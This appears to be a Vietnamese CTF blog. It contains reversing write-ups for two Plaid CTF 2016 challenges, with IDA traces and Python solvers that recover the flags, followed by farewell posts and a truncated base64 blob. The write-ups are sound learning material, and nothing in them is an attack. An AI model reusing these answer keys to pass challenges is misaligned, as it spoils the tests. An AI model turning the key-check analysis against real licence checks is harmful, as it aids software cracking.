by

[Plaid CTF 2016] quite quixotic quest (Re300)

Hãy chuẩn bị tinh thần, vì đây là bài 300 điểm của một giải có rating 90.

2016fd1c9ed8-0e7f-40f3-b2b9-a23104c6361e

quite quixotic quest

Reversing (300 pts)

Well yes, it certainly is quite quixotic. (Yes, the flag format is PCTF{} )

Link dự phòng: quixotic

Đề bài là một file ELF 32 bit. Mặc dù đã có trong tay IDA phiên bản hịn (mà cả thế giới đều có), mình vẫn ưa 32 bit. Cười trong ô tô thì vẫn thích hơn là khóc trên xe đạp, right?

Xem danh sách string, dễ thấy nó chính là curl cải trang:

1
2
  Desktop ./qqq
curl: try 'curl --help' or 'curl --manual' for more information

Mình đã định dùng BinDiff, nhưng thật thô bỉ khi đồng đội của mình chỉ cho mình cái này:

1
.rodata:08121788 0000004A C      --pctfkey KEY   Validate KEY as the PlaidCTF flag for this challenge

Tức là flag sẽ được nhập qua option –pctfkey. No fun.

1
2
3
  Desktop ./qqq --pctf "PCTF{đồ ngốc}"
Validating key...
wrong

Still no fun, chuỗi Validating key… kia đáng ra cần được che giấu kỹ càng hơn. Mình hoàn toàn cảm thấy bị xúc phạm khi mọi thứ cứ thẳng tuồn tuột như thế.

1
2
3
4
5
6
7
.text:08052AAC                 mov     dword ptr [esp], offset aValidatingKey_ ; "Validating key...\n"
.text:08052AB3                 call    curl_mprintf    ; Call Procedure
.text:08052AB8                 mov     edx, [ebx+128h]
.text:08052ABE                 mov     eax, offset magic_buf
.text:08052AC3                 mov     esp, eax
.text:08052AC5                 mov     eax, edx
.text:08052AC7                 retn        

Vì EAX = magic_buf, rồi ESP = EAX, nên ESP = magic_buf. Sau khi debug một chút, chúng ta thấy rằng (có vẻ như) chương trình thực thi một rop chain (trỏ bởi magic_buf). Sau khi step over một hồi, chúng ta sẽ gặp badboy, được build từng char một (‘w’, ‘r’, ‘o’, ‘n’, ‘g’) bằng câu lệnh:

1
2
3
4
5
6
7
8
9
10
.text:08066CB9                 mov     eax, offset hostname_cache
.text:0804E242                 pop     edx
.text:08095621                 mov     [eax], edx
.text:080E161F                 inc     eax    
.text:0804E242                 pop     edx
.text:08095621                 mov     [eax], edx
.text:080E161F                 inc     eax    
.text:0804E242                 pop     edx
.text:08095621                 mov     [eax], edx
...

F8 không văn minh lắm, hãy chuyển qua chức năng trace của IDA. Đặt BP ở 0x08052AC7 và chạy lại, bật Instruction Tracing -> F9 -> Badboy -> Mở Trace window (mình quy ước rằng trace log mình post chỉ chứa những câu lệnh mà các bạn cần quan tâm):

1
2
3
4
5
6
7
8
00001567 .text:addbyter:loc_805DB7D add     ebx, eax        ; Add   EBX=0000000C                            
00001567 .text:getparameter+2562 pop     edx                     EDX=00000035 ESP=0818C0E0              
00001567 .text:curlx_tvdiff+37   sub     edx, ebx        ; Integer Subtraction EDX=00000029 PF=0 AF=1                  
00001567 .text:curlx_tvdiff+3C   pop     ebx                     EBX=00000000 ESP=0818C0E8
00001567 .text:_Unwind_GetDataRelBase+6 pop     eax                     EAX=00000094 ESP=0818C0F0  
00001567 .text:malloc_usable_size+1E cmovnz  eax, ebx        ; Move if Not Zero (ZF=0) EAX=00000000    
00001567 .text:memcpy:loc_80AD35D mov     edi, eax                 EDI=00000000  
00001567 .eh_frame:081887E4       add     esp, edi        ; Add   AF=0  

Ta thấy EBX = len(key) (mình đang nhập key PCTF{123456}), sau đó EDX -= EBX, tiếp theo EAX = 0x94 và EBX = 0. Nếu cờ ZF = 0 thì lệnh CMOVNZ làm cho EAX = EBX = 0, ngược lại EAX giữ nguyên = 0x94. Sau đó EDI = EAX và ESP += EDI.

Do cờ ZF được quyết định bởi lệnh SUB EDX, EBX, nên kết quả của phép trừ EDX (0x35) cho EBX (len(key)) sẽ ảnh hưởng trực tiếp đến luồng thực thi của chương trình (hoặc ESP += 0, hoặc ESP += 0x94). Như vậy, len(key) = 0x35.

yOy5OI1

Nhập key mới (PCTF{1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJK}) và trace lại:

1
2
3
4
5
6
7
8
9
10
00001572 .text:__underflow:loc_80A40C9 movzx   eax, byte ptr [eax]; Move with Zero-Extend EAX=0000007D
00001572 .eh_frame:loc_8187036 pop     ecx ECX=00000000 ESP=0818C258
00001572 .text:__guess_grouping+3C add     ecx, eax        ; Add ECX=0000007D PF=1
00001572 .text:getparameter+2562 pop     edx EDX=081CCF10 ESP=0818C26C
00001572 .eh_frame:081887E6 add     [edx], ecx      ; Add CF=0 PF=1
00001572 .text:__underflow:loc_80A40C9 movzx   eax, byte ptr [eax]; Move with Zero-Extend EAX=0000004B
00001572 .eh_frame:loc_8187036 pop     ecx ECX=00000000 ESP=0818C258
00001572 .text:__guess_grouping+3C add     ecx, eax        ; Add ECX=0000004B PF=1
00001572 .text:getparameter+2562 pop     edx EDX=081CCF10 ESP=0818C26C
00001572 .eh_frame:081887E6 add     [edx], ecx      ; Add CF=0 AF=1

Đoạn code này làm nhiệm vụ cộng từng ký tự của key vào [EDX]. Khi đã nắm được ý tưởng, ta có thể filter log trace, hoặc đặt BP và F9 để qua nhanh nhưng vẫn đảm bảo việc theo dõi được vòng lặp. Thực tế thì chương trình chỉ tính sum(key[1:]) mà thôi.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
00001572 .text:memcpy+4F mov     esi, edx ESI=081CCF10
00001572 .text:__strnlen_sse2+6CE ror     byte ptr [edx], 5Fh; Rotate Right OF=1
00001572 .eh_frame:08178748 rol     dword ptr [edx], 1; Rotate Left OF=0
00001572 .eh_frame:loc_8187036 pop     ecx ECX=01F9933D ESP=0818C29C
00001572 .text:gmtime_r+1B xor     [esi], ecx      ; Logical Exclusive OR CF=0 AF=0
00001572 .text:__strcpy_ssse3+173C mov     eax, edx EAX=081CCF10
00001572 .text:Curl_has:loc_807BD79 mov     eax, [eax] EAX=01F9B731
00001572 .text:getcwd+668 xor     eax, 0C7FFFFFAh ; Logical Exclusive OR EAX=C60648CB AF=0 SF=1
00001572 .text:memcpy:loc_80AD35D mov     edi, eax EDI=C60648CB
00001572 .text:_IO_new_file_seekoff+1A1 mov     edx, edi EDX=C60648CB
00001572 .eh_frame:08176458 pop     eax EAX=081CCF20 ESP=0819C2D8
00001572 .text:_Unwind_SetIP+8 mov     [eax+4Ch], edx
00001572 .text:Curl_multi_content...+12 xor     edx, edx        ; Logical Exclusive OR EDX=00000000 PF=1 ZF=1 SF=0
00001572 .text:__strnlen_sse2+4C9 lea     eax, [eax+4]    ; Load Effective Address EAX=081CCF24
00001572 .text:_Unwind_SetIP+8 mov     [eax+4Ch], edx
00001721 .text:Curl_md5it push    esi ESP=0819C3A8
...
MD5_Update
...
MD5Final
...

Giá trị 01F9933D khi đổi qua DEC sẽ là 33133373, không có gì đặc biệt, mình chỉ nhắc thế thôi. Hãy chuyển sang debug để quan sát stack và các vùng nhớ liên quan. Tại hàm Curl_md5it, tham số thứ 2 trỏ đến 081CCF6C, đúng bằng [eax+4Ch], và chuỗi MD5 kết quả sẽ lưu ở 081CE9C0. Tổng kết lại, đến thời điểm này chúng ta có giả mã sau:

1
2
3
4
5
6
7
8
s = sum(key[1:])
s = ror(s, 0x5f)
s = rol(s, 1)
s ^= 0x01F9933D
s ^= 0x0C7FFFFFA
 
[0x081CCF6C] = s
[0x081CE9C0] = md5([0x081CCF6C])

Tiếp tục:

1
2
3
4
5
6
00001728 .text:MD5_Final+1FF pop     esi ESI=081CE9C0 ESP=0819C3B4
00001728 .text:smtp_endofresp+53 mov     eax, esi EAX=081CE9C0
00001728 .text:Curl_has...:loc_807BD79 mov     eax, [eax] EAX=FEBA6E76
00001728 .text:__registe...+7E pop     edi EDI=86F4FA3F ESP=0819C3D8
00001728 .text:__readvall+2C xor     eax, edi        ; Logical Exclusive OR EAX=784E9449
00001728 .text:__strncpy_ssse3+1F80 cmp     eax, 5BFFFFFFh  ; Compare Two Operands AF=1

Mã giả tương ứng:

1
2
3
eax = md5_hash[0]
eax ^= 0x86F4FA3F
eax == 0x5BFFFFFF

Đoạn code sau sẽ cho ta biết giá trị của s:

1
2
3
4
5
6
7
8
9
10
11
for i in xrange(0xFF * 0x34):
s = i
s = (s & 0xFFFFFF00) | ror(s & 0xFF, 0x5f, 8)
s = rol(s, 1, 32)
s ^= 0x01F9933D
s ^= 0x0C7FFFFFA
 
m = unpack('I', md5(pack('I', s))[:8].decode('hex'))[0]
if m == 0x5BFFFFFF ^ 0x86F4FA3F:
print 'found:', i, md5(pack('I', s))
break

1
found: 5215 c0050bdd747721646f14ff008c6978b9

Input lại một key phù hợp (PCTF{eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeed}).

1
2
3
4
5
6
7
8
9
10
11
00001738 .text:getparameter+2562 pop     edx EDX=081CCF38 ESP=081AC3F4
00001738 .text:get_scope:loc_80C91EF mov     edx, [edx+8] EDX=082045F0
00001738 .text:multi_get...:loc_8061D38 xor     eax, eax        ; Logical Exclusive OR EAX=00000000 PF=1 ZF=1
00001738 .text:customrequest_helper+65 xor     al, [ebx+5E5B30C4h]; Logical Exclusive OR EAX=000000C0 ZF=0 SF=1
00001738 .eh_frame:081768B5 xor     [edx], al       ; Logical Exclusive OR
00001738 .text:_nl_...+144 inc     ebx             ; Increment by 1 EBX=A9C1B90A SF=1
00001738 .text:__memset_sse2_rep+497 inc     edx             ; Increment by 1 EDX=0883B60E SF=0 OF=0
00001738 .text:multi_get...:loc_8061D38 xor     eax, eax        ; Logical Exclusive OR EAX=00000000 PF=1 ZF=1
00001738 .text:customrequest_helper+65 xor     al, [ebx+5E5B30C4h]; Logical Exclusive OR EAX=000000C0 ZF=0 SF=1
00001738 .eh_frame:081768B5 xor     [edx], al       ; Logical Exclusive OR
...

Đoạn trên là một vòng lặp, với EDX sẽ trỏ đến key và EBX+5E5B30C4 trỏ đến chuỗi MD5.
Sắp xong rồi, cố lên >:(

36

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
00001759 .text:Curl_multi_...+12 xor     edx, edx        ; Logical Exclusive OR EDX=00000000 CF=0 PF=1 ZF=1
00001759 .text:mu...:loc_8061D38 xor     eax, eax        ; Logical Exclusive OR EAX=00000000
00001759 .eh_frame:08187951 or      eax, [ebx+0Ah]  ; Logical Inclusive OR EAX=9B5F4690 ZF=0 SF=1
00001759 .eh_frame:loc_8187036 pop     ecx ECX=9B5F4690 ESP=081AC948
00001759 .text:__strcmp_ssse3+13E8 sub     eax, ecx        ; Integer Subtraction EAX=00000000 ZF=1 SF=0
00001759 .text:isnanl+3C or      edx, eax        ; Logical Inclusive OR
00001759 .text:0805D7B4 add     ebx, esi        ; Add EBX=0883B5F6 PF=1
...
00001759 .text:multi...:loc_8061D38 xor     eax, eax        ; Logical Exclusive OR PF=1 ZF=1
00001759 .eh_frame:08187951 or      eax, [ebx+0Ah]  ; Logical Inclusive OR EAX=0144120F ZF=0
00001759 .eh_frame:loc_8187036 pop     ecx ECX=17541D0F ESP=081AC964
00001759 .text:__strcmp_ssse3+13E8 sub     eax, ecx        ; Integer Subtraction EAX=E9EFF500 CF=1 SF=1
00001759 .text:isnanl+3C or      edx, eax        ; Logical Inclusive OR EDX=E9EFF500 CF=0
00001759 .text:0805D7B4 add     ebx, esi        ; Add EBX=0883B5FA CF=0
...

Debug để thấy giá trị các biến, ta thấy rằng chương trình thực hiện việc lấy từng dword trong key (sau khi đã xor với chuỗi MD5), rồi trừ cho ECX, và OR vào EDX. Khi bắt đầu, EDX = 0. Các giá trị của ECX lần lượt như sau:

1
ecx = [0x9b5f4690, 0x17541d0f, 0x5F9E4B1B, 0xCD0C58E0, 0xA95460AC, 0x034F1E1C, 0x6CA02530, 0xE61D02BD, 0xBE5435B4, 0x3B4D1B15, 0x668F7B1D, 0xD81B1AF9, 0xB3646CB4, 0x00000009]

1
2
3
4
5
6
00001759 .text:_IO_default_showmanyc mov     eax, 0FFFFFFFFh EAX=FFFFFFFF
00001759 .text:isinfl+55 and     eax, edx        ; Logical AND SF=1
00001759 .text:smtp_multi_statemach+25 pop     ebx EBX=FFFDF620 ESP=081ACAD0
00001759 .text:malloc_usable_size+1E cmovnz  eax, ebx        ; Move if Not Zero (ZF=0) EAX=FFFDF620
00001759 .text:memcpy:loc_80AD35D mov     edi, eax EDI=FFFDF620
00001759 .eh_frame:081887E4 add     esp, edi        ; Add ESP=0818C108 CF=1 PF=0 SF=0

Ở đây lại là một trick tương tự mà mình đã nhắc đến phần đầu bài, khi mà cờ ZF sẽ ảnh hưởng đến luồng thực thi của chương trình. Cờ ZF được quyết định ở câu lệnh AND EAX, EDX, và vì EAX = 0xFFFFFFFF, EDX cần bằng 0 để cờ này được bật.
Ta nhớ rằng EDX là phép OR của mọi giá trị EAX – ECX, do đó để EDX = 0 thì mọi hiệu EAX – ECX phải bằng 0, hay nói cách khác, EAX phải bằng ECX. Đoạn code sau, như mọi khi, mang lại cho chúng ta flag:

1
2
3
4
5
6
7
8
h = 'c0050bdd747721646f14ff008c6978b9'.decode('hex')
ecx = [0x9b5f4690, 0x17541d0f, 0x5F9E4B1B, 0xCD0C58E0, 0xA95460AC, 0x034F1E1C, 0x6CA02530, 0xE61D02BD, 0xBE5435B4, 0x3B4D1B15, 0x668F7B1D, 0xD81B1AF9, 0xB3646CB4, 0x00000009]
flag = ''
for i in xrange(len(ecx)):
hi = i % 4
s = pack('I', unpack('I', h[hi * 4:hi * 4 + 4])[0] ^ ecx[i])
flag += s
print flag[:0x35]

Nếu bạn thắc mắc tại sao với cách làm hư cấu thế này, mà mình lại có thể trở thành người giải ra thứ hai (:”>), thì bạn thắc mắc đúng rồi đấy. Trong lúc thi mình không hề dùng cách này. Hihi.

32

by

[Plaid CTF 2016] quick (Re175)

Tôi cảm thấy mình cần phải thức tỉnh, khi mà hàng ngày vẫn có biết bao lượt truy cập vào blog này, trong khi last post của nó đã cách đây hơn 1 năm. Tôi thật tệ.

quick

Reversing (175 pts)

Why be slow when you can be quick?

File dự phòng: quick

Người lười như tôi thường sau khi down đề về sẽ mở nó bằng notepad, xem mấy byte đầu thấy ELF thì tôi sẽ kéo nó vào IDA 32 bit, nếu sai tôi lại kéo nó sang IDA x64. Dạo trước có đợt tôi quyết tâm thoát lười, sau khi xem vài byte đầu bằng notepad tôi vẫn ráng xem thêm vài dòng bên dưới, nếu thấy x86-64 thì chỉ phải kéo một phát vào IDA là đúng luôn. Lâu không tập, tôi mất cmn luôn kỹ năng ấy.

Ok, bài này là ELF x64. Xem danh sách hàm trong IDA bạn sẽ thấy nó dùng Swift, để chạy nó chúng ta cần file bị thiếu bên dưới (hãy dùng Ubuntu 14.04 nếu muốn thành người văn minh):

1
2
3
4
5
6
7
8
  Desktop ldd ./quick
linux-vdso.so.1 =>  (0x00007fff4f5a3000)
libswiftCore.so => not found
libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007fa36792c000)
libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fa367626000)
libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007fa367410000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa36704b000)
/lib64/ld-linux-x86-64.so.2 (0x00007fa367c30000)

Hàm main khá dài, tôi không biết nó làm trò con bò gì, nhưng hàm check key nằm ở 0x403660. Nó cũng không ngắn gì cho cam. Chúng ta có 2 mảng 33 phần tử, kiểu thế này (tôi không paste code IDA ở đây vì tôi không thích):

1
2
arr1 = [0x81, 0x74, 0x87, 0x79, 0xB0, 0x6A, 0xAA, 0xA7, 0x68, 0x94, 0xA4, 0x7B, 0xAF, 0x89, 0xD4, 0xD1, 0x92, 0xBE, 0x94, 0xD8, 0x92, 0xCC, 0xDA, 0xD1, 0xD3, 0xA9, 0xD3, 0xAA, 0xEC, 0xA8, 0xDD, 0xEF, 0xFA]
arr2 = [0x50, 0x43, 0x8A, 0x64, 0xED, 0xA6, 0xAB, 0x93, 0xCC, 0xEB, 0xC2, 0x9A, 0xFA, 0x6A, 0xAB, 0x93, 0xCC, 0xEB, 0x6A, 0xBB, 0x62, 0x33, 0xD1, 0xF5, 0xC2, 0x9A, 0xFA, 0x6A, 0xBB, 0x62, 0x33, 0xD1, 0xD7]

Hàm check này cần trả về 1, và chúng ta thấy nó trả về 0 ở đây:

1
2
3
4
5
6
7
8
9
10
11
    _TTSg5Vs5UInt8___TFSag9subscriptFSix(&v70, v60, v66);
    v14 = &v69;
    v16 = v70;
    _TTSg5Vs5UInt8___TFSag9subscriptFSix(&v69, v60, v65);
    if ( v16 != v69 )
    {
      swift_release(v113);
      swift_release(v65);
      swift_release(v66);
      return 0;
    }

Bạn sẽ thắc mắc vì sao tôi không rename mấy cái biến trên. Câu hỏi rất hay, tôi xin phép không trả lời.

Dễ thấy rằng nó so sánh v16 với v69. Mà v16 = v70, v70 lấy từ câu lệnh (google “subscript swift” nếu bạn muốn):

1
_TTSg5Vs5UInt8___TFSag9subscriptFSix(&v70, v60, v66);

v66, thật tình cờ, được quyết định ngay ở đầu hàm check – là kết quả trả về của hàm 0x403600. Trong hàm này có 2 hàm con, hãy để ý tên các hàm import từ Swift để suy ra chức năng của nó. Tôi tin bạn sẽ làm được, chúng ta đã đọc Conan cả chục năm rồi. Cụ thể: 0x402810 làm nhiệm vụ sort input của ta (bé đến lớn, dùng …ComparablerS_4sortfT_GSaWxS0_S1___, tên dài lắm), còn 0x403050 sẽ tính tổng từng cặp phần tử trong *input của ta* và *input của ta_đã sort*, kết quả chính là v66.

Tương tự như vậy, v69 lấy từ v65, v65 chính là arr1. Và tóm lại, 2 mảng arr1 và mảng v66 phải bằng nhau.

1
2
3
4
5
6
def check1(s):
  s_sorted = s[::]
  s_sorted.sort()
 
  for i in xrange(len(arr1)):
    assert s[i] + s_sorted[i] == arr1[i]

Để vượt qua bước check này, bạn chỉ cần 5 phút. Để bỏ cuộc. Hãy sang phần check thứ hai.

12057133_687329614735151_682897352_n

Vẫn với skill dò ngược thần thánh, bạn sẽ thấy rằng nó so sánh một mảng x với arr2. Tất nhiên, quan trọng là mảng x được tính thế nào.

1
2
3
4
5
6
7
8
9
10
    _TFSag9subscriptFSix(&v72, v54, v57, &TMVs9Character);
    v52 = v72;
    v36 = v73;
    v51 = sub_402AD0(v72, v73);
    if ( ~v36 & 1 )
      swift_release(v52);
    v71 = sub_403510(v111, v51);
    v34 = &v71;
    _TTSg5Vs5UInt8___TFSa6appendfxT_(&v71, &v112);
    v111 = v51;

Ở đoạn code trên, v112 chính là mảng x, v57 là *input của ta*, 0x403510 là hàm ror, 0x402AD0 tôi quên cmn rồi (hình như nó chả làm cái khỉ gì). Chuyển sang python:

1
2
3
4
5
def check2(s):
  n = 0
  for i in xrange(len(arr2)):
    assert ror(s[i], n & 7) == arr2[i]
    n = s[i]

Nhìn qua thì chúng ta cảm giác rằng check2 dễ hơn check1, nhưng nếu thử code thì bạn sẽ thấy là nó không sai. Đoạn code này sẽ cho ta flag:

1
2
3
4
5
6
n = 0
s = [0] * 33
for i in xrange(33):
  s[i] = rol(arr2[i], n & 7, 8)
  n = s[i]
print ''.join(map(chr, s))

Kiểm tra lại flag với check1, thấy đúng luôn. Kỳ lạ.

20163c25a8d8-c48c-411b-b324-f59ab1f26fd1

by

New Post, New Year ^_^

Tôi từng có một lời nguyền là trừ khi giành giải nhất một cuộc thi nào đó, chứ không thì tôi không writeup gì hết. Nói gì thì nói, thằng về đầu tiên nói sao cũng được, nói sao cũng đúng, những thằng còn lại rồi cũng sẽ bị quên lãng mà thôi.

Tôi đùa đấy.

Cái blog một thời dễ thương này, bỗng dưng trở thành cái web chết, nửa năm không cất tiếng hân hoan, chẳng phải vì tôi hết cái để viết, mà chủ yếu vì tôi thấy không cần phải viết nữa. Thế quái nào mà trước giờ tôi cứ nghĩ mình vẫn còn trẻ, 9x thì là còn trẻ, rồi bỗng nhìn xung quanh, đứa này đứa kia cũng đã gọi tôi là anh cả rồi. Gặp đứa nhỏ nhắn thì sinh năm 94, mà gặp đứa cao to thì sinh năm 96. Thế cho nên, cái tuổi của tôi không còn được chú ý vì cái sự gọi là trẻ trung nữa, mà giờ người ta chỉ dành mỹ từ đó cho tụi nhóc kia thôi, cái tụi ở trên gọi tôi bằng anh ấy.

Còn về CTF, giờ nói như một bài rap ngày xưa tôi hay nghe, thì các team “mọc lên như cây nấm” vậy. Người đông, team đông, lăn xả nhiều. Hồi giữa năm 2013, tôi lúc đó có thể cày ngày cày đêm mà chẳng vì cái gì cả, trên xe bus có thể lôi quyển vở ra gạch gạch xóa xóa để làm một bài crypto của EMC. Nay thức đến 1h, 2h là đã bắt đầu suy nghĩ, nào là sáng mai dậy sớm sẽ thấy mệt, sáng mai dậy sớm sẽ thấy mỏi, sáng mai đến công ty sẽ nhận ra mình nông nổi và lỡ có ngủ quên thì rất có thể là bị đuổi.

Tôi ít mộng mơ hơn, ít bất chấp hơn, mặc dù nói thật ra thì vẫn chỉ là dạng “trái tim còn muốn yêu nhưng lý trí nó không cho phép”. CTF tôi thấy nó hay thật, nhưng nhiều lúc nó cứ đều đều quá, đánh đố quá, nên sinh chán. Lại cả, CTF bây giờ như một cuộc thi toàn vũ trụ, không phân hạng 1, hạng 2, hạng 3 như bóng đá (về thể thao tôi biết mỗi trò này), nên có cái cảnh là team mạnh thì nhất hoài, còn team chưa mạnh dẫu cố mãi cũng không gặt được thành quả. Kiểu như cho U19 VN đấu với Real ấy. Thua 10 trận còn đá tiếp được, chứ thua đến 99 trận rồi thì chắc cũng chỉ đá nốt cho xong, chứ niềm tin là cạn rồi.

Mà đó là nói về vụ thành tích, chứ về mặt học tập tôi nghĩ CTF có nhiều cái hay, không phủ nhận được. Đợt tôi đăng ký môn học chậm, trường đóng rồi, may nhờ một tẹo sách vở mảng Web mà qua được, rồi nay mới có thể ra trường. Tôi cảm ơn nhiều lắm. Công việc hàng ngày, có tí CTF trong đầu, cũng tự tin hơn hẳn. Tôi nghĩ nếu tự tin hơn thì chắc cũng đẹp trai hơn, cuốn hút con gái hơn. Như hôm trước có ông tôi thấy rõ là khù khờ, đùng một cái kêu cưới vợ, rồi giải trình ra chuyện tình cảm đến tầm gần chục năm. Kỳ diệu.

7

Vừa đi liên hoan về, người cứ lâng lâng, hơi hơi say. Chẳng biết là tôi có còn viết thêm bài nào không nữa. Chẳng biết tôi có còn thi được mấy giải CTF nữa. Tính tôi ưa nghĩ nhiều, sẵn đang miệt mài trong mớ cảm xúc, tôi viết lại vài dòng, lúc tỉnh rồi sợ ngại ngày ngại kia, không viết được, mấy năm sau thì quên mất. Là quên thật, tôi bị suốt.

Tôi rất cảm ơn anh **censored**, dù chả họ hàng gì nhưng bên tôi rất lâu, từ những ngày tôi không có gì cả, cho đến tận lúc tôi trắng tay. Rồi cả khi dìu dắt tôi vào **censored** (xong bỏ đó), tạo cơ hội cho tôi biết đến CTF. Có một giai đoạn tôi không hợp tính của **censored**, nhưng về cơ bản thì rồi cũng quen quen. FA có hai kiểu FA, một kiểu là người tốt, một kiểu là người xấu. Anh là kiểu người tốt, nhưng khá xấu.

Tôi rất cảm ơn tập thể **censored**. Cũng phải gọi là từng ăn nằm với nhau, kề vai sát cánh bên nhau mới đủ. Tôi còn nhớ như in lần đi team building của công ty, ngồi sau xe máy đứa bạn mà tôi vẫn lôi con **censored** ra check FB, chat chit loạn cả lên để theo dõi mọi người thi một giải CTF. Hồi đó tôi mê lắm, xin nghỉ team building để ở nhà thi mà không được, tối trước khi đi vẫn còn cố nhắn gửi mọi người… Hờ hờ hờ… ngày ấy sao mà đẹp quá.

Tôi rất cảm ơn tập thể **censored**. Giải ba **censored** đối với tôi có giá trị hơn giải nhất **censored** rất nhiều. Tôi luôn thừa nhận rằng chúng tôi chỉ có thể giành giải ba là cao, nhưng không thể nói dối rằng tôi không có gì hối tiếc. Tôi thực sự đã có thể có được một kết quả tốt hơn. Nhưng cuộc sống là vậy, quá khứ luôn có vài hoạt cảnh khiến chúng ta muốn quay về và thay đổi nó. Chim sẻ từng đổi nick thành “Giải ba Thái Nguyên” sau khi không thể vô địch, chắc tôi cũng đổi sang “Giải ba **censored**” luôn. Ôi, mới đó mà tôi đã yêu Chim sẻ được gần 5 năm rồi T_T

17

Nếu hỏi tôi trong suốt chặng đường CTF của mình, kỷ niệm nào là đẹp nhất, thì tôi nghĩ đó là giải **censored** **censored**. Cuộc thi này chắc ít người để ý, ít người quan tâm, nhưng đối với tôi, đó là những ngày được đắm chìm trọn vẹn trong nó và rồi nhận được kết quả xứng đáng. Một cuộc thi quyến rũ, những bài thi kích thích (trừ vài bài tương đối gồ ghề, nham nhở) cùng một giải thưởng nhỏ xinh. Tôi từng ao ước sẽ tổ chức được một giải CTF cho các bạn thuộc hạng 2, hạng 3 (tức không phải hạng 1), đề thi dễ thương, có giải thưởng, có tiền, có cúp, có giấy khen. Mỗi cái một chút thôi, nhưng là một người từng đi thi, tôi biết nó có sức khích lệ lớn lao lắm. Xin được giữ ước mơ này lại cho các thế hệ đời sau, dù chắc là cũng không còn mấy cơ hội để  được gọi tên nhau…

Good game, well played. Chẳng mấy mà đã tới lúc phải tính đến những chuyện khác rồi. Cảm ơn CTF vì tất cả (giải thưởng) nó đã mang lại cho tôi. Xin chúc cho những người từng là đồng đội của tôi gặt hái được nhiều thành công hơn nữa, bay thật xa, xa, xa hơn nữa…

“Anh không buồn vì mọi thứ, nhưng anh sẽ buồn vì mất em
Anh chỉ hối tiếc vì ngày đó… sao không nắm lại mà phải buông…”

6

 

by

Repost: RE Driver Checker v2.7.4 by P.E Onimusha & Unregistered !

Rất cảm ơn anh Kiên đã cho em thấy là ngày xưa em viết văn như thế nào, mới đó mà cũng đã 4 năm, đầu óc ngày một ngu đi còn các chi thì vẫn gầy nhẳng…

Nhiều cái, nghĩ cho cùng thì cũng chỉ là thú tiêu khiển, bóng đá, nhảy dây, breakdance, hát hò, crack, ctf, học hành… chẳng đi đến đâu cả, leo lưng chừng xong lại rớt bịch xuống đất. Đến tuổi rồi thì cũng như người ta, ham yêu đương, lấy vợ, đi làm kiếm lương, mang về mua gạo, mua thịt, mua chai dầu ăn để đun nấu, mua cái chổi để quét nhà, mua cái ca để uống nước.

Good game, well played…

 36

https://kienmanowar.wordpress.com/2014/07/15/re-driver-checker-v2-7-4-by-p-e-onimusha-unregistered/

P.S: (Lỗi bảo mật được che giấu suốt 4 năm) Bài này theo em nhớ thì thằng Unreg nó sang tận nhà em để hint. Hoàn toàn là lỗi của nó, no fun.

38

by

byectf

Chúc mừng năm mới tới tất cả những bạn đang đọc mấy dòng chữ này (bạn nào chưa đọc thì đến lúc đọc sẽ chúc sau).

Một năm đã trôi qua xét theo tờ lịch, và nửa năm đã trôi qua xét theo sự sống còn của site này. Mình xin phép thông báo rộng rãi đến toàn thể các bạn quan tâm, là mình sẽ cho nó nghỉ ngơi dưỡng sức, thời điểm trở lại chưa biết trước (vì mình dạo này bu di quá, không lo cho nó được nữa, chia tay sớm bớt đau bớt khổ) too_sad

Trong giai đoạn thiếu hụt tình cảm nghiêm trọng này, thật may mắn là mình đã kịp tìm ra một nơi chốn vô cùng bổ ích khác, đó là:

VGxSWk1FNTZZelJPVkUweFRucGFhVTE2UlRCT2FsSnNUbFJSTVZsVVZURk9WR013VG5wVmVVNVVR
VEZaVkZVelRYcEZNbGxVV1RGTwpSRmt4VFdwak1VNXFUVEJPZWxFeVRtcG5NUXBPYWxVd1RrUlZl
azFxVlRGT2JVMHhUV3BTYlU1VVVUSmFSRkV5VG5wTk1VMTZXbXhPClIwVXhUbFJaZVU1RVdUQlpW
Rmw0VGxSUk1VNXFWVEZOZWtVeVRYcFZNazVYUlRGT1ZGVXhDazV0U1hwUFZGVXpUbFJKZWsxRVRY
aE4KZWsweFRtcFJNMDE2VlROT2VsVXpUbTFKZWs1VVVUSk9SMVV4VG1wVk1rNVVTWGRaVkZVeVRr
UlZNVmxVV1hoT1ZGa3lXV3BXYUU1VQpXVElLVGxSYWFrNVVTVEZQVkZsNlRrUlZNVmxVVW14T1ZF
a3lXbFJSZVU1Nlp6Rk9hbFV6VFhwRmVrNUVWVEJPZW1NelRVUlpOVTVVCldURk9SRkY1VFhwVk1V
NXFVVE5PZWxFeFRYcFZNZ3BPYlVsNlRVUmpNMDVIVlRGT2FsVXlUbFJqTVU1cVVURk9la0V5VFZS
Vk5VNVUKWTNwTlZGSnNUbXBSZWsxVVZYbE9lbEV5VFhwUk5FNUhSVEJhVkZVeFRsUm5NRTFxVlhk
T1ZHc3hDazU2WXpST1ZGa3lUa1JOZUU1VQpTVE5OYWxVeFRtMU5NMDFFV21wTlIwVXlUVlJrYUU1
RVdUQk9hbFV5VG0xTk1VMXFVbWxPVkZFeVdrUlZNazU2U1RGT2FsVTBUbXBuCk1VNVVWVElLVFhw
Tk1FMXFWVEJPVkdzeFRtcFZNVTE2UlRGT2FsVXlUbGRGTVU1VVZYaE9iVWw2VDFSWk5FNXFTVEJP
YW1OM1RucFoKTVU1cVVUTk9lbEV4VFhwWmVVNXRTWHBOVkZVeVRrZFZNUXBPVkZVeVRsUm5NazFx
VlROT2FtY3hUVVJSZWs1dFRURlBWR016VGxSWgpNVTlFV1RST1ZGVXlUV3BSTWs1SFJUSk5WRlpv
VGxSWk1VNVVUWGhPYWxFd1RtcFdhRTVVVlRGTlZGcHBDazE2VlRKUFJFSm9UbXBKCk1FNTZZek5O
ZWtFeFRtcFJNMDU2WnpGTmVsVXhUbTFKZWsxVVZUSk9SMVV4VGtSV2FFNVhSVEpPVkZwcVRrZEZN
VTFFVm1oT1ZHTjYKVFZSU2JFNXFWVEFLVG1wVmVVNTZVVEpOZWxFeVRsZEZNRnBVV1hoT01rVXhU
